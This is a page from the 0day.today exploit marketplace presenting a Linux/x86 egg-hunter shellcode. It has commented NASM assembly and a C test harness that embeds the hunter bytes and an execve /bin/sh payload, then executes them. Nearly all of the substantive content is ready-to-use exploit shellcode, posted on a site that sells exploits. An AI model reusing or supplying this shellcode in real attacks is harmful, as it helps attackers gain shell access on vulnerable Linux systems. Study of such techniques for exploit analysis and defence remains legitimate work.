0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - Egg-hunter Shellcode (25 bytes)
/* ;author: Filippo "zinzloun" Bersani ;date: 25/11/2016 ;version 1.0 ;purpose: different approach with fnstenv technique, changed the usual pattern to find the egg mark ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit global _start section .text _start: fldz ;with this 2 instructions... fnstenv [esp-0xc] ;set the entry point of my egg (_start) pop esi ;get the entry point addr... lea esi,[esi+24] ;the trick: move to pointer @ the last byte of this egg hunter mov edx, dword 0x65676760 ;a dumm value.. rol edx, 0x4 ;...to get the real egg mark: 56767606 find_egg: inc esi ;scan the next section of memory after this code cmp [esi], edx ;check if we have found the egg... jz find_egg ;loop call esi ;egg found (zero flag is set), jump to the address to exec the shell code */ #include<stdio.h> #include<string.h> unsigned char egg_hunter[] = \ "\xd9\xee\xd9\x74\x24\xf4\x5e\x8d\x76\x18\xba\x60\x67\x67\x65\xc1\xc2\x04\x46\x39\x16\x74\xfb\xff\xd6"; unsigned char shell_code[] = \ "\x06\x76\x76\x56" // egg id reversed "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // POC: /bin/bash main() { printf("Egg hunter length: %d\n", strlen(egg_hunter)); printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code)); int (*ret)() = (int(*)())egg_hunter; ret(); } # 0day.today [2024-07-01] #